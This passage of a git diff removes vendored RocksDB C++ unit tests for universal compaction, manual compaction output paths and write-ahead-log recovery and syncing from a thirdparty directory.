-    ASSERT_OK(Put(1, Key(i), RandomString(&rnd, 10000)));
-    dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-
-  // Stage 2: reopen with universal compaction, num_levels=4
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = 4;
-  options = CurrentOptions(options);
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  verify_func(max_key1);
-
-  // Insert more keys
-  for (int i = max_key1 + 1; i <= max_key2; i++) {
-    // each value is 10K
-    ASSERT_OK(Put(1, Key(i), RandomString(&rnd, 10000)));
-    dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-
-  verify_func(max_key2);
-  // Compaction to non-L0 has happened.
-  ASSERT_GT(NumTableFilesAtLevel(options.num_levels - 1, 1), 0);
-
-  // Stage 3: Revert it back to one level and revert to num_levels=1.
-  options.num_levels = 4;
-  options.target_file_size_base = INT_MAX;
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  // Compact all to level 0
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 0;
-  compact_options.exclusive_manual_compaction = exclusive_manual_compaction_;
-  dbfull()->CompactRange(compact_options, handles_[1], nullptr, nullptr);
-  // Need to restart it once to remove higher level records in manifest.
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  // Final reopen
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = 1;
-  options = CurrentOptions(options);
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  // Insert more keys
-  for (int i = max_key2 + 1; i <= max_key3; i++) {
-    // each value is 10K
-    ASSERT_OK(Put(1, Key(i), RandomString(&rnd, 10000)));
-    dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-  verify_func(max_key3);
-}
-
-
-TEST_P(DBTestUniversalCompaction, UniversalCompactionSecondPathRatio) {
-  if (!Snappy_Supported()) {
-    return;
-  }
-  Options options = CurrentOptions();
-  options.db_paths.emplace_back(dbname_, 500 * 1024);
-  options.db_paths.emplace_back(dbname_ + "_2", 1024 * 1024 * 1024);
-  options.compaction_style = kCompactionStyleUniversal;
-  options.compaction_options_universal.size_ratio = 5;
-  options.write_buffer_size = 111 << 10;  // 114KB
-  options.arena_block_size = 4 << 10;
-  options.level0_file_num_compaction_trigger = 2;
-  options.num_levels = 1;
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(KNumKeysByGenerateNewFile - 1));
-
-  std::vector<std::string> filenames;
-  env_->GetChildren(options.db_paths[1].path, &filenames);
-  // Delete archival files.
-  for (size_t i = 0; i < filenames.size(); ++i) {
-    env_->DeleteFile(options.db_paths[1].path + "/" + filenames[i]);
-  }
-  env_->DeleteDir(options.db_paths[1].path);
-  Reopen(options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  // First three 110KB files are not going to second path.
-  // After that, (100K, 200K)
-  for (int num = 0; num < 3; num++) {
-    GenerateNewFile(&rnd, &key_idx);
-  }
-
-  // Another 110KB triggers a compaction to 400K file to second path
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-
-  // (1, 4)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1,1,4) -> (2, 4)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 2, 4) -> (3, 4)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(2, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  // (1, 3, 4) -> (8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  // (1, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 1, 8) -> (2, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 2, 8) -> (3, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(2, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  // (1, 3, 8) -> (4, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(2, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  // (1, 4, 8) -> (5, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(2, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  for (int i = 0; i < key_idx; i++) {
-    auto v = Get(Key(i));
-    ASSERT_NE(v, "NOT_FOUND");
-    ASSERT_TRUE(v.size() == 1 || v.size() == 990);
-  }
-
-  Reopen(options);
-
-  for (int i = 0; i < key_idx; i++) {
-    auto v = Get(Key(i));
-    ASSERT_NE(v, "NOT_FOUND");
-    ASSERT_TRUE(v.size() == 1 || v.size() == 990);
-  }
-
-  Destroy(options);
-}
-
-TEST_P(DBTestUniversalCompaction, FullCompactionInBottomPriThreadPool) {
-  const int kNumFilesTrigger = 3;
-  Env::Default()->SetBackgroundThreads(1, Env::Priority::BOTTOM);
-  for (bool allow_ingest_behind : {false, true}) {
-    Options options = CurrentOptions();
-    options.allow_ingest_behind = allow_ingest_behind;
-    options.compaction_style = kCompactionStyleUniversal;
-    options.num_levels = num_levels_;
-    options.write_buffer_size = 100 << 10;     // 100KB
-    options.target_file_size_base = 32 << 10;  // 32KB
-    options.level0_file_num_compaction_trigger = kNumFilesTrigger;
-    // Trigger compaction if size amplification exceeds 110%
-    options.compaction_options_universal.max_size_amplification_percent = 110;
-    DestroyAndReopen(options);
-
-    int num_bottom_pri_compactions = 0;
-    SyncPoint::GetInstance()->SetCallBack(
-        "DBImpl::BGWorkBottomCompaction",
-        [&](void* arg) { ++num_bottom_pri_compactions; });
-    SyncPoint::GetInstance()->EnableProcessing();
-
-    Random rnd(301);
-    for (int num = 0; num < kNumFilesTrigger; num++) {
-      ASSERT_EQ(NumSortedRuns(), num);
-      int key_idx = 0;
-      GenerateNewFile(&rnd, &key_idx);
-    }
-    dbfull()->TEST_WaitForCompact();
-
-    if (allow_ingest_behind || num_levels_ > 1) {
-      // allow_ingest_behind increases number of levels while sanitizing.
-      ASSERT_EQ(1, num_bottom_pri_compactions);
-    } else {
-      // for single-level universal, everything's bottom level so nothing should
-      // be executed in bottom-pri thread pool.
-      ASSERT_EQ(0, num_bottom_pri_compactions);
-    }
-    // Verify that size amplification did occur
-    ASSERT_EQ(NumSortedRuns(), 1);
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  }
-  Env::Default()->SetBackgroundThreads(0, Env::Priority::BOTTOM);
-}
-
-TEST_P(DBTestUniversalCompaction, ConcurrentBottomPriLowPriCompactions) {
-  if (num_levels_ == 1) {
-    // for single-level universal, everything's bottom level so nothing should
-    // be executed in bottom-pri thread pool.
-    return;
-  }
-  const int kNumFilesTrigger = 3;
-  Env::Default()->SetBackgroundThreads(1, Env::Priority::BOTTOM);
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = num_levels_;
-  options.write_buffer_size = 100 << 10;     // 100KB
-  options.target_file_size_base = 32 << 10;  // 32KB
-  options.level0_file_num_compaction_trigger = kNumFilesTrigger;
-  // Trigger compaction if size amplification exceeds 110%
-  options.compaction_options_universal.max_size_amplification_percent = 110;
-  DestroyAndReopen(options);
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {// wait for the full compaction to be picked before adding files intended
-       // for the second one.
-       {"DBImpl::BackgroundCompaction:ForwardToBottomPriPool",
-        "DBTestUniversalCompaction:ConcurrentBottomPriLowPriCompactions:0"},
-       // the full (bottom-pri) compaction waits until a partial (low-pri)
-       // compaction has started to verify they can run in parallel.
-       {"DBImpl::BackgroundCompaction:NonTrivial",
-        "DBImpl::BGWorkBottomCompaction"}});
-  SyncPoint::GetInstance()->EnableProcessing();
-
-  Random rnd(301);
-  for (int i = 0; i < 2; ++i) {
-    for (int num = 0; num < kNumFilesTrigger; num++) {
-      int key_idx = 0;
-      GenerateNewFile(&rnd, &key_idx, true /* no_wait */);
-      // use no_wait above because that one waits for flush and compaction. We
-      // don't want to wait for compaction because the full compaction is
-      // intentionally blocked while more files are flushed.
-      dbfull()->TEST_WaitForFlushMemTable();
-    }
-    if (i == 0) {
-      TEST_SYNC_POINT(
-          "DBTestUniversalCompaction:ConcurrentBottomPriLowPriCompactions:0");
-    }
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  // First compaction should output to bottom level. Second should output to L0
-  // since older L0 files pending compaction prevent it from being placed lower.
-  ASSERT_EQ(NumSortedRuns(), 2);
-  ASSERT_GT(NumTableFilesAtLevel(0), 0);
-  ASSERT_GT(NumTableFilesAtLevel(num_levels_ - 1), 0);
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  Env::Default()->SetBackgroundThreads(0, Env::Priority::BOTTOM);
-}
-
-TEST_P(DBTestUniversalCompaction, RecalculateScoreAfterPicking) {
-  // Regression test for extra compactions scheduled. Once enough compactions
-  // have been scheduled to bring the score below one, we should stop
-  // scheduling more; otherwise, other CFs/DBs may be delayed unnecessarily.
-  const int kNumFilesTrigger = 8;
-  Options options = CurrentOptions();
-  options.compaction_options_universal.max_merge_width = kNumFilesTrigger / 2;
-  options.compaction_options_universal.max_size_amplification_percent =
-      static_cast<unsigned int>(-1);
-  options.compaction_style = kCompactionStyleUniversal;
-  options.level0_file_num_compaction_trigger = kNumFilesTrigger;
-  options.num_levels = num_levels_;
-  options.write_buffer_size = 100 << 10;  // 100KB
-  Reopen(options);
-
-  std::atomic<int> num_compactions_attempted(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:Start", [&](void* arg) {
-        ++num_compactions_attempted;
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Random rnd(301);
-  for (int num = 0; num < kNumFilesTrigger; num++) {
-    ASSERT_EQ(NumSortedRuns(), num);
-    int key_idx = 0;
-    GenerateNewFile(&rnd, &key_idx);
-  }
-  dbfull()->TEST_WaitForCompact();
-  // Compacting the first four files was enough to bring the score below one so
-  // there's no need to schedule any more compactions.
-  ASSERT_EQ(1, num_compactions_attempted);
-  ASSERT_EQ(NumSortedRuns(), 5);
-}
-
-INSTANTIATE_TEST_CASE_P(UniversalCompactionNumLevels, DBTestUniversalCompaction,
-                        ::testing::Combine(::testing::Values(1, 3, 5),
-                                           ::testing::Bool()));
-
-class DBTestUniversalManualCompactionOutputPathId
-    : public DBTestUniversalCompactionBase {
- public:
-  DBTestUniversalManualCompactionOutputPathId() :
-      DBTestUniversalCompactionBase(
-          "/db_universal_compaction_manual_pid_test") {}
-};
-
-TEST_P(DBTestUniversalManualCompactionOutputPathId,
-       ManualCompactionOutputPathId) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.db_paths.emplace_back(dbname_, 1000000000);
-  options.db_paths.emplace_back(dbname_ + "_2", 1000000000);
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = num_levels_;
-  options.target_file_size_base = 1 << 30;  // Big size
-  options.level0_file_num_compaction_trigger = 10;
-  Destroy(options);
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-  MakeTables(3, "p", "q", 1);
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ(2, TotalLiveFiles(1));
-  ASSERT_EQ(2, GetSstFileCount(options.db_paths[0].path));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[1].path));
-
-  // Full compaction to DB path 0
-  CompactRangeOptions compact_options;
-  compact_options.target_path_id = 1;
-  compact_options.exclusive_manual_compaction = exclusive_manual_compaction_;
-  db_->CompactRange(compact_options, handles_[1], nullptr, nullptr);
-  ASSERT_EQ(1, TotalLiveFiles(1));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[0].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-
-  ReopenWithColumnFamilies({kDefaultColumnFamilyName, "pikachu"}, options);
-  ASSERT_EQ(1, TotalLiveFiles(1));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[0].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-
-  MakeTables(1, "p", "q", 1);
-  ASSERT_EQ(2, TotalLiveFiles(1));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[0].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-
-  ReopenWithColumnFamilies({kDefaultColumnFamilyName, "pikachu"}, options);
-  ASSERT_EQ(2, TotalLiveFiles(1));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[0].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-
-  // Full compaction to DB path 0
-  compact_options.target_path_id = 0;
-  compact_options.exclusive_manual_compaction = exclusive_manual_compaction_;
-  db_->CompactRange(compact_options, handles_[1], nullptr, nullptr);
-  ASSERT_EQ(1, TotalLiveFiles(1));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[0].path));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[1].path));
-
-  // Fail when compacting to an invalid path ID
-  compact_options.target_path_id = 2;
-  compact_options.exclusive_manual_compaction = exclusive_manual_compaction_;
-  ASSERT_TRUE(db_->CompactRange(compact_options, handles_[1], nullptr, nullptr)
-                  .IsInvalidArgument());
-}
-
-INSTANTIATE_TEST_CASE_P(DBTestUniversalManualCompactionOutputPathId,
-                        DBTestUniversalManualCompactionOutputPathId,
-                        ::testing::Combine(::testing::Values(1, 8),
-                                           ::testing::Bool()));
-
-}  // namespace rocksdb
-
-#endif  // !defined(ROCKSDB_LITE)
-
-int main(int argc, char** argv) {
-#if !defined(ROCKSDB_LITE)
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-#else
-  return 0;
-#endif
-}
diff --git a/thirdparty/rocksdb/db/db_wal_test.cc b/thirdparty/rocksdb/db/db_wal_test.cc
deleted file mode 100644
index 461fe46..0000000
--- a/thirdparty/rocksdb/db/db_wal_test.cc
+++ /dev/null
@@ -1,1229 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/db_test_util.h"
-#include "options/options_helper.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "util/fault_injection_test_env.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-class DBWALTest : public DBTestBase {
- public:
-  DBWALTest() : DBTestBase("/db_wal_test") {}
-};
-
-TEST_F(DBWALTest, WAL) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    WriteOptions writeOpt = WriteOptions();
-    writeOpt.disableWAL = true;
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "foo", "v1"));
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "bar", "v1"));
-
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_EQ("v1", Get(1, "bar"));
-
-    writeOpt.disableWAL = false;
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "bar", "v2"));
-    writeOpt.disableWAL = true;
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "foo", "v2"));
-
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    // Both value's should be present.
-    ASSERT_EQ("v2", Get(1, "bar"));
-    ASSERT_EQ("v2", Get(1, "foo"));
-
-    writeOpt.disableWAL = true;
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "bar", "v3"));
-    writeOpt.disableWAL = false;
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "foo", "v3"));
-
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    // again both values should be present.
-    ASSERT_EQ("v3", Get(1, "foo"));
-    ASSERT_EQ("v3", Get(1, "bar"));
-  } while (ChangeWalOptions());
-}
-
-TEST_F(DBWALTest, RollLog) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_OK(Put(1, "baz", "v5"));
-
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    for (int i = 0; i < 10; i++) {
-      ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    }
-    ASSERT_OK(Put(1, "foo", "v4"));
-    for (int i = 0; i < 10; i++) {
-      ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    }
-  } while (ChangeWalOptions());
-}
-
-TEST_F(DBWALTest, SyncWALNotBlockWrite) {
-  Options options = CurrentOptions();
-  options.max_write_buffer_number = 4;
-  DestroyAndReopen(options);
-
-  ASSERT_OK(Put("foo1", "bar1"));
-  ASSERT_OK(Put("foo5", "bar5"));
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"WritableFileWriter::SyncWithoutFlush:1",
-       "DBWALTest::SyncWALNotBlockWrite:1"},
-      {"DBWALTest::SyncWALNotBlockWrite:2",
-       "WritableFileWriter::SyncWithoutFlush:2"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rocksdb::port::Thread thread([&]() { ASSERT_OK(db_->SyncWAL()); });
-
-  TEST_SYNC_POINT("DBWALTest::SyncWALNotBlockWrite:1");
-  ASSERT_OK(Put("foo2", "bar2"));
-  ASSERT_OK(Put("foo3", "bar3"));
-  FlushOptions fo;
-  fo.wait = false;
-  ASSERT_OK(db_->Flush(fo));
-  ASSERT_OK(Put("foo4", "bar4"));
-
-  TEST_SYNC_POINT("DBWALTest::SyncWALNotBlockWrite:2");
-
-  thread.join();
-
-  ASSERT_EQ(Get("foo1"), "bar1");
-  ASSERT_EQ(Get("foo2"), "bar2");
-  ASSERT_EQ(Get("foo3"), "bar3");
-  ASSERT_EQ(Get("foo4"), "bar4");
-  ASSERT_EQ(Get("foo5"), "bar5");
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBWALTest, SyncWALNotWaitWrite) {
-  ASSERT_OK(Put("foo1", "bar1"));
-  ASSERT_OK(Put("foo3", "bar3"));
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"SpecialEnv::WalFile::Append:1", "DBWALTest::SyncWALNotWaitWrite:1"},
-      {"DBWALTest::SyncWALNotWaitWrite:2", "SpecialEnv::WalFile::Append:2"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rocksdb::port::Thread thread([&]() { ASSERT_OK(Put("foo2", "bar2")); });
-  // Moving this to SyncWAL before the actual fsync
-  // TEST_SYNC_POINT("DBWALTest::SyncWALNotWaitWrite:1");
-  ASSERT_OK(db_->SyncWAL());
-  // Moving this to SyncWAL after actual fsync
-  // TEST_SYNC_POINT("DBWALTest::SyncWALNotWaitWrite:2");
-
-  thread.join();
-
-  ASSERT_EQ(Get("foo1"), "bar1");
-  ASSERT_EQ(Get("foo2"), "bar2");
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBWALTest, Recover) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_OK(Put(1, "baz", "v5"));
-
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_EQ("v1", Get(1, "foo"));
-
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_EQ("v5", Get(1, "baz"));
-    ASSERT_OK(Put(1, "bar", "v2"));
-    ASSERT_OK(Put(1, "foo", "v3"));
-
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_EQ("v3", Get(1, "foo"));
-    ASSERT_OK(Put(1, "foo", "v4"));
-    ASSERT_EQ("v4", Get(1, "foo"));
-    ASSERT_EQ("v2", Get(1, "bar"));
-    ASSERT_EQ("v5", Get(1, "baz"));
-  } while (ChangeWalOptions());
-}
-
-TEST_F(DBWALTest, RecoverWithTableHandle) {
-  do {
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    options.disable_auto_compactions = true;
-    options.avoid_flush_during_recovery = false;
-    DestroyAndReopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_OK(Put(1, "bar", "v2"));
-    ASSERT_OK(Flush(1));
-    ASSERT_OK(Put(1, "foo", "v3"));
-    ASSERT_OK(Put(1, "bar", "v4"));
-    ASSERT_OK(Flush(1));
-    ASSERT_OK(Put(1, "big", std::string(100, 'a')));
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-
-    std::vector<std::vector<FileMetaData>> files;
-    dbfull()->TEST_GetFilesMetaData(handles_[1], &files);
-    size_t total_files = 0;
-    for (const auto& level : files) {
-      total_files += level.size();
-    }
-    ASSERT_EQ(total_files, 3);
-    for (const auto& level : files) {
-      for (const auto& file : level) {
-        if (kInfiniteMaxOpenFiles == option_config_) {
-          ASSERT_TRUE(file.table_reader_handle != nullptr);
-        } else {
-          ASSERT_TRUE(file.table_reader_handle == nullptr);
-        }
-      }
-    }
-  } while (ChangeWalOptions());
-}
-
-TEST_F(DBWALTest, IgnoreRecoveredLog) {
-  std::string backup_logs = dbname_ + "/backup_logs";
-
-  do {
-    // delete old files in backup_logs directory
-    env_->CreateDirIfMissing(backup_logs);
-    std::vector<std::string> old_files;
-    env_->GetChildren(backup_logs, &old_files);
-    for (auto& file : old_files) {
-      if (file != "." && file != "..") {
-        env_->DeleteFile(backup_logs + "/" + file);
-      }
-    }
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    options.merge_operator = MergeOperators::CreateUInt64AddOperator();
-    options.wal_dir = dbname_ + "/logs";
-    DestroyAndReopen(options);
-
-    // fill up the DB
-    std::string one, two;
-    PutFixed64(&one, 1);
-    PutFixed64(&two, 2);
-    ASSERT_OK(db_->Merge(WriteOptions(), Slice("foo"), Slice(one)));
-    ASSERT_OK(db_->Merge(WriteOptions(), Slice("foo"), Slice(one)));
-    ASSERT_OK(db_->Merge(WriteOptions(), Slice("bar"), Slice(one)));
-
-    // copy the logs to backup
-    std::vector<std::string> logs;
-    env_->GetChildren(options.wal_dir, &logs);
-    for (auto& log : logs) {
-      if (log != ".." && log != ".") {
-        CopyFile(options.wal_dir + "/" + log, backup_logs + "/" + log);
-      }
-    }
-
-    // recover the DB
-    Reopen(options);
-    ASSERT_EQ(two, Get("foo"));
-    ASSERT_EQ(one, Get("bar"));
-    Close();
-
-    // copy the logs from backup back to wal dir
-    for (auto& log : logs) {
-      if (log != ".." && log != ".") {
-        CopyFile(backup_logs + "/" + log, options.wal_dir + "/" + log);
-      }
-    }
-    // this should ignore the log files, recovery should not happen again
-    // if the recovery happens, the same merge operator would be called twice,
-    // leading to incorrect results
-    Reopen(options);
-    ASSERT_EQ(two, Get("foo"));
-    ASSERT_EQ(one, Get("bar"));
-    Close();
-    Destroy(options);
-    Reopen(options);
-    Close();
-
-    // copy the logs from backup back to wal dir
-    env_->CreateDirIfMissing(options.wal_dir);
-    for (auto& log : logs) {
-      if (log != ".." && log != ".") {
-        CopyFile(backup_logs + "/" + log, options.wal_dir + "/" + log);
-      }
-    }
-    // assert that we successfully recovered only from logs, even though we
-    // destroyed the DB
-    Reopen(options);
-    ASSERT_EQ(two, Get("foo"));
-    ASSERT_EQ(one, Get("bar"));
-
-    // Recovery will fail if DB directory doesn't exist.
-    Destroy(options);
-    // copy the logs from backup back to wal dir
-    env_->CreateDirIfMissing(options.wal_dir);
-    for (auto& log : logs) {
-      if (log != ".." && log != ".") {
-        CopyFile(backup_logs + "/" + log, options.wal_dir + "/" + log);
-        // we won't be needing this file no more
-        env_->DeleteFile(backup_logs + "/" + log);
-      }
-    }
-    Status s = TryReopen(options);
-    ASSERT_TRUE(!s.ok());
-    Destroy(options);
-  } while (ChangeWalOptions());
-}
-
-TEST_F(DBWALTest, RecoveryWithEmptyLog) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_OK(Put(1, "foo", "v2"));
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "foo", "v3"));
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_EQ("v3", Get(1, "foo"));
-  } while (ChangeWalOptions());
-}
-
-#if !(defined NDEBUG) || !defined(OS_WIN)
-TEST_F(DBWALTest, PreallocateBlock) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 10 * 1000 * 1000;
-  options.max_total_wal_size = 0;
-
-  size_t expected_preallocation_size = static_cast<size_t>(
-      options.write_buffer_size + options.write_buffer_size / 10);
-
-  DestroyAndReopen(options);
-
-  std::atomic<int> called(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBTestWalFile.GetPreallocationStatus", [&](void* arg) {
-        ASSERT_TRUE(arg != nullptr);
-        size_t preallocation_size = *(static_cast<size_t*>(arg));
-        ASSERT_EQ(expected_preallocation_size, preallocation_size);
-        called.fetch_add(1);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  Put("", "");
-  Flush();
-  Put("", "");
-  Close();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  ASSERT_EQ(2, called.load());
-
-  options.max_total_wal_size = 1000 * 1000;
-  expected_preallocation_size = static_cast<size_t>(options.max_total_wal_size);
-  Reopen(options);
-  called.store(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBTestWalFile.GetPreallocationStatus", [&](void* arg) {
-        ASSERT_TRUE(arg != nullptr);
-        size_t preallocation_size = *(static_cast<size_t*>(arg));
-        ASSERT_EQ(expected_preallocation_size, preallocation_size);
-        called.fetch_add(1);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  Put("", "");
-  Flush();
-  Put("", "");
-  Close();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  ASSERT_EQ(2, called.load());
-
-  options.db_write_buffer_size = 800 * 1000;
-  expected_preallocation_size =
-      static_cast<size_t>(options.db_write_buffer_size);
-  Reopen(options);
-  called.store(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBTestWalFile.GetPreallocationStatus", [&](void* arg) {
-        ASSERT_TRUE(arg != nullptr);
-        size_t preallocation_size = *(static_cast<size_t*>(arg));
-        ASSERT_EQ(expected_preallocation_size, preallocation_size);
-        called.fetch_add(1);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  Put("", "");
-  Flush();
-  Put("", "");
-  Close();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  ASSERT_EQ(2, called.load());
-
-  expected_preallocation_size = 700 * 1000;
-  std::shared_ptr<WriteBufferManager> write_buffer_manager =
-      std::make_shared<WriteBufferManager>(static_cast<uint64_t>(700 * 1000));
-  options.write_buffer_manager = write_buffer_manager;
-  Reopen(options);
-  called.store(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBTestWalFile.GetPreallocationStatus", [&](void* arg) {
-        ASSERT_TRUE(arg != nullptr);
-        size_t preallocation_size = *(static_cast<size_t*>(arg));
-        ASSERT_EQ(expected_preallocation_size, preallocation_size);
-        called.fetch_add(1);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  Put("", "");
-  Flush();
-  Put("", "");
-  Close();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  ASSERT_EQ(2, called.load());
-}
-#endif  // !(defined NDEBUG) || !defined(OS_WIN)
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBWALTest, FullPurgePreservesRecycledLog) {
-  // For github issue #1303
-  for (int i = 0; i < 2; ++i) {
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    options.recycle_log_file_num = 2;
-    if (i != 0) {
-      options.wal_dir = alternative_wal_dir_;
-    }
-
-    DestroyAndReopen(options);
-    ASSERT_OK(Put("foo", "v1"));
-    VectorLogPtr log_files;
-    ASSERT_OK(dbfull()->GetSortedWalFiles(log_files));
-    ASSERT_GT(log_files.size(), 0);
-    ASSERT_OK(Flush());
-
